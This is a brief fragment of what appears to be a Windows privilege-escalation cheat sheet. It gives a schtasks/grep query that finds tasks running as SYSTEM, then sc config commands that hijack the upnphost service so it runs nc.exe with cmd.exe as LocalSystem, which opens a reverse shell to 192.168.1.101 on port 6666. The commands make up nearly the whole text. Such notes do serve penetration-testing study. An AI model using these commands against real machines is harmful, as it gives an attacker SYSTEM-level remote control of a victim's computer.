Sheduled Tasks
schtasks /query /fo LIST /vcat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEMChange the upnp service binary
sc config upnphost binpath= "C:\Inetpub\nc.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""Last updated